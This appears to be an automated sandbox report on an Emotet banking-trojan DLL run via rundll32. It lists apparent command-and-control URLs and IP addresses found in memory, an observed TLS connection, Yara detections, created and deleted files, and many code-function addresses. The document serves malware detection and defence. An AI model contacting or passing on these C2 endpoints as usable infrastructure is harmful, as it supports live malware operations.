Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/lhQ
Source: rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQlY
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQ~Y
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14/
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14/akR=
Source: rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14:7080/
Source: rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14:7080/VoY
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14:7080/k
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14:7080/kp
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://177.72.80.14:7080/kst
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://196.44.98.190/
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://196.44.98.190/)k
Source: rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://196.44.98.190:8080/
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.882539966.0000000000CD0000.00000004.00000020.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	String found in binary or memory: https://196.44.98.190:8080/cRBQvElvVswAKMbGJRCeWFEoAKWVURRoDepPZnuTejOhPOKJ
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/GEGDSODavaAMfbQXuktdlcgqQGPldhWooFcQtRsikthZVdhkisiiQD
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000008.00000002.882575499.0000000000CDA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/rLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs
Source: rundll32.exe, 00000008.00000003.380789393.0000000000D79000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.882575499.0000000000CDA000.00000004.00000020.sdmp, rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	String found in binary or memory: https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs
Source: rundll32.exe, 00000008.00000002.882575499.0000000000CDA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs5
Source: svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000011.00000003.489823418.0000018F11BB4000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489811039.0000018F11B8C000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489888481.0000018F11B9D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489902032.0000018F12002000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489840536.0000018F11BB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_10021027 InternetReadFile,

8_2_10021027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49761 version: TLS 1.2

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.a46e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.d16c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a76c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.a76c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a76c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.3696cf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3516cc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.a76c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3516cc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.a46e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.d16c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.a46e78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.3696cf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.d16c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.360524597.0000000000A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.361688769.0000000000A46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.367502574.0000000003696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.364197169.0000000000A3A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.362028571.0000000003516000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.362088501.0000000000A46000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: pYebrdRKvR.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Olcnhkjrspgysi\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33BB30	3_2_6F33BB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F339F20	3_2_6F339F20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33B2B0	3_2_6F33B2B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F346564	3_2_6F346564
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33B080	3_2_6F33B080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33BB30	4_2_6F33BB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F339F20	4_2_6F339F20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33B2B0	4_2_6F33B2B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F346564	4_2_6F346564
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33B080	4_2_6F33B080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000441E	4_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001CAA8	4_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100143B3	4_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10004C00	4_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10008C09	4_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10011C10	4_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000F41F	4_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000EC27	4_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001F83F	4_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001E441	4_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002043	4_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003845	4_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A048	4_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001406E	4_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001C76	4_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001748A	4_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000CC8D	4_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D091	4_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003C91	4_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000AC95	4_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001AC9B	4_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100178A5	4_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100144AA	4_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100190BA	4_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100198BD	4_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100208D1	4_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001CCD4	4_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001ECE3	4_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001A8F0	4_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100030F6	4_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003502	4_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001FD10	4_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000251C	4_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005923	4_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002292B	4_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001F14D	4_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C158	4_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001056A	4_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014D8D	4_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000758F	4_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000FD91	4_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021193	4_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D99A	4_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10019DA1	4_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001B1B5	4_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100225C3	4_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100055E8	4_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C5FE	4_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001A0A	4_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000220A	4_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000E21C	4_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10015220	4_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009E22	4_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D223	4_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021A3C	4_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002A46	4_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002654	4_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009A57	4_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10007283	4_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10020687	4_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014E8A	4_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000FEA0	4_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D6A7	4_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000DAAE	4_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005AB2	4_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001BEC9	4_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10017ED1	4_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10010ADE	4_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001AEEB	4_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001DEF4	4_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002309	4_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10006B25	4_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10020B34	4_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021343	4_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003345	4_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003F5C	4_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10011F6B	4_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001577E	4_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009384	4_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10004F8E	4_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001B397	4_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10012FA2	4_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014BAA	4_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10017BB2	4_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000BFB6	4_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10006FC4	4_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A3DF	4_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001BFE8	4_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100203F1	4_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10004C00	5_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000441E	5_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000F41F	5_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002043	5_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003845	5_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002A46	5_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001CAA8	5_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100190BA	5_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100208D1	5_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001ECE3	5_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001AEEB	5_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001DEF4	5_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001056A	5_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009384	5_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D99A	5_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10017BB2	5_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10008C09	5_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001A0A	5_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000220A	5_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10011C10	5_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000E21C	5_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10015220	5_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009E22	5_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000D223	5_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000EC27	5_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001F83F	5_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021A3C	5_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001E441	5_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000A048	5_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002654	5_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009A57	5_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001406E	5_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001C76	5_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10007283	5_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10020687	5_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014E8A	5_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001748A	5_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000CC8D	5_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D091	5_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003C91	5_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000AC95	5_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001AC9B	5_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000FEA0	5_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100178A5	5_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D6A7	5_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100144AA	5_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000DAAE	5_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10005AB2	5_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100198BD	5_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001BEC9	5_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10017ED1	5_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001CCD4	5_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10010ADE	5_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001A8F0	5_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100030F6	5_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003502	5_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002309	5_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001FD10	5_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000251C	5_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10005923	5_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10006B25	5_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1002292B	5_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10020B34	5_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021343	5_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003345	5_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001F14D	5_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000C158	5_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003F5C	5_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10011F6B	5_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001577E	5_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014D8D	5_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10004F8E	5_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000758F	5_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000FD91	5_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021193	5_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001B397	5_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10019DA1	5_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10012FA2	5_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014BAA	5_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100143B3	5_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001B1B5	5_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000BFB6	5_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100225C3	5_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10006FC4	5_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000A3DF	5_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100055E8	5_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001BFE8	5_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100203F1	5_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000C5FE	5_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004C00	6_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000441E	6_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003845	6_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002A46	6_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014E8A	6_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100208D1	6_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001ECE3	6_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001AEEB	6_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DEF4	6_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009384	6_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D99A	6_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017BB2	6_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10008C09	6_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001A0A	6_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000220A	6_2_1000220A
